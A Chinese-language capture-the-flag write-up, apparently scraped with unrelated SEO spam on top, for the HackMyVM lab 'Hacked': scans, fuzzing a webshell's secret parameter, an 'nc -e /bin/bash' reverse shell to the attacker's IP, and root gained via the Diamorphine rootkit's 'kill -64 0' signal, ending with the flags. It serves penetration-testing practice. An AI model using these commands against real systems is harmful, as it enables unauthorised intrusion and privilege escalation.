企业网站的建立联系方式,做好网络推广的技巧,五大搜索引擎 三大门户网站,登录我的企业邮箱tags:
HMVrootkitDiamorphine Type: wp
1. 基本信息^toc 文章目录 1. 基本信息^toc2. 信息收集2.1. 端口扫描2.2. 目录扫描2.3. 获取参数 3. 提权 靶机链接 https://hackmyvm.eu/machines/machine.php?vmHacked 作者 sml 难度 ⭐️⭐️⭐️⭐️️ 2. 信息收集
2.1. 端口扫描…
tags:
HMVrootkitDiamorphine Type: wp
1. 基本信息^toc 文章目录 1. 基本信息^toc2. 信息收集2.1. 端口扫描2.2. 目录扫描2.3. 获取参数 3. 提权 靶机链接 https://hackmyvm.eu/machines/machine.php?vmHacked 作者 sml 难度 ⭐️⭐️⭐️⭐️️ 2. 信息收集
2.1. 端口扫描
┌──(root㉿kali)-[/home/kali/hmv/hacked]
└─# fscan -h 192.168.42.185___ _/ _ \ ___ ___ _ __ __ _ ___| | __/ /_\/____/ __|/ __| __/ _ |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|
\____/ |___/\___|_| \__,_|\___|_|\_\fscan version: 1.8.4
start infoscan
192.168.42.185:22 open
192.168.42.185:80 open主页
┌──(root㉿kali)-[/home/kali/hmv/hacked]
└─# curl http://192.168.42.185/
HACKED BY h4x0r2.2. 目录扫描
┌──(root㉿kali)-[/home/kali/hmv/hacked]
└─# dirsearch -u http://192.168.42.185/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.htmlfrom pkg_resources import DistributionNotFound, VersionConflict_|. _ _ _ _ _ _|_ v0.4.3(_||| _) (/_(_|| (_| )Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460Output File: /home/kali/hmv/hacked/reports/http_192.168.42.185/__24-12-01_18-09-55.txtTarget: http://192.168.42.185/[18:09:55] Starting:
[18:10:13] 200 - 16B - /robots.txt
[18:10:14] 302 - 62B - /simple-backdoor.php - /┌──(root㉿kali)-[/home/kali/hmv/hacked]
└─# curl http://192.168.42.185/robots.txt
/secretnote.txt┌──(root㉿kali)-[/home/kali/hmv/hacked]
└─# curl http://192.168.42.185//secretnote.txt
[X] Enumeration
[X] Exploitation
[X] Privesc
[X] Maintaining Access.|__ Webshell installed.|__ Root shell created.-h4x0r┌──(root㉿kali)-[/home/kali/hmv/hacked]
└─# curl http://192.168.42.185//simple-backdoor.php
I modified this webshell to only execute my secret parameter.收集到的信息
用户 h4x0r
webshell /simple-backdoor.php
执行参数 未知2.3. 获取参数
从收集的这些信息当中猜测Webshell的参数 试了几个参数都不对。猜测可能是需要爆破才行
┌──(root㉿kali)-[/home/kali/hmv/hacked]
└─# ffuf -u http://192.168.42.185/simple-backdoor.php?FUZZid -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt |grep -v Size: 62/___\ /___\ /___\/\ \__/ /\ \__/ __ __ /\ \__/\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/\ \_\ \ \_\ \ \____/ \ \_\\/_/ \/_/ \/___/ \/_/v2.1.0-dev
________________________________________________:: Method : GET:: URL : http://192.168.42.185/simple-backdoor.php?FUZZid:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt:: Follow redirects : false:: Calibration : false:: Timeout : 10:: Threads : 40:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________secret [Status: 302, Size: 115, Words: 12, Lines: 2, Duration: 19ms]获取到参数是 secret 之前有在网页试过这个参数。应该是302了导致没有显示出来 抓包的话可以看到
弹shell
nc -e /bin/bash 192.168.42.39 1111
nc%20-e%20%2Fbin%2Fbash%20192.168.42.39%201111[18:42:48] Welcome to pwncat ! __main__.py:164
[18:46:34] received connection from 192.168.42.185:36606 bind.py:84
[18:46:35] 192.168.42.185:36606: registered new host w/ db manager.py:957
(local) pwncat$
(remote) www-datahacked:/var/www/html$ whoami
www-data
(remote) www-datahacked:/var/www/html$ id
uid33(www-data) gid33(www-data) groups33(www-data)
(remote) www-datahacked:/var/www/html$3. 提权
这靶机上gcc编译不了。找不到Ld 可以尝试从其他版本相近的靶机编译后传过来。 这里我就不尝试了
使用linpeas进行检测。也没有发现什么利用点
去看一下wp才发现原来这里存在Rootkit https://github.com/m0nad/Diamorphine
kill -63 0 取消隐藏进程
lsmod 列出加载到内核中的模块可以看到确实安装了[[…/…/26-工具使用/Diamorphine使用|Diamorphine]]
[[…/…/26-工具使用/Diamorphine使用|海洛因]]有一个特征 我们发送信号64即可获取到root
(remote) www-datahacked:/tmp$ kill -64 0
(remote) roothacked:/tmp$ id
uid0(root) gid0(root) groups0(root),33(www-data)(remote) roothacked:/root$ sh flag.sh. *** *.,**,, ,*., *,/ *,* *,/. .*.* **,* ,*** *.** **.,* ***, ,** ***, .**. **** ,*,** *,
-------------------------PWNED HOST: hackedPWNED DATE: Sun Dec 1 06:32:33 EST 2024WHOAMI: uid0(root) gid0(root) groups0(root),33(www-data)FLAG: HMVhackingthehacker------------------------remote) roothacked:/home/h4x0r$ sh flag.sh. *** *.,**,, ,*., *,/ *,* *,/. .*.* **,* ,*** *.** **.,* ***, ,** ***, .**. **** ,*,** *,
-------------------------PWNED HOST: hackedPWNED DATE: Sun Dec 1 06:32:55 EST 2024WHOAMI: uid0(root) gid0(root) groups0(root),33(www-data)FLAG: HMVimthabesthacker------------------------
